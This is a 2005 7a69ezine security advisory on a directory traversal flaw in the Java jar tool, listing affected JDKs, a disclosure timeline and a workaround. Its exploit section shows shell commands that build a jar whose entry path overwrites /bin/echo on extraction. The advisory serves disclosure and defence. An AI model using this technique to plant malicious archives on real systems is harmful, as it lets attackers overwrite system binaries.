- ------------------------------------------------------------------ 7a69ezine Advisories 7a69Adv#23 - ------------------------------------------------------------------ http://www.7a69ezine.org [01/04/2005] - ------------------------------------------------------------------ Title: Jar tool directory transversal vulnerability Author: Pluf - <pluf@xxxxxxxxxxxxx> Remote: no Exploit: yes Severity: Medium-High - ------------------------------------------------------------------ I. Introduction. Jar is a java archiving and compression application, which is part of many java development kits. It was desgined mainly to facilitate the packaging of java applets or applications into a single archive. II. Description. The jar tool does not check properly if the files to be extracted have the string "../" on its names, so it's possible for an attacker to create a malicious jar file in order to overwrite arbitrary files within the filesystem. III. Affected Software. The following java development kits have been tested and contain the vulnerability, but maybe others kits and/or platforms could be affected by the same: * SUN: Sun's J2SE Development Kit 1.5.0 (Solaris, Windows and Linux version) Sun's J2SE Development Kit 1.4.2 (Solaris, Windows and Linux version) * IBM: IBM Java Development Kit 1.4.2 Linux * BEA: BEA WebLogic's J2SE Development Kit, version 1.5.0 (Linux and Windows version) * BLACKDOWN: Blackdown Java Development Kit 1.4.2 Linux IV. Exploit. A malicious jar file can be created as follows: java4fun# echo hi hi java4fun# jar cvf trash.jar *.class ..o..o..o..o..o..o..obinoecho java4fun# ht trash.jar (change the 'o' by '/') java4fun# jar xvf trash.jar (no overwrite message confirmation) java4fun# echo hi hi, you've just infected yourself!!! V. Patch. Not available. Use unzip instead of jar. VI. Timeline. 23/03/2005 Bug discovered. 28/03/2005 Mail sent to vendors. 28/03/2005 Sun response. 02/04/2005 Mail sent to vendors (second try) 09/04/2005 Advisory released VII. Extra data You can find more 7a69ezine advisories on this following link: http://www.7a69ezine.org/avisos/propios [spanish info]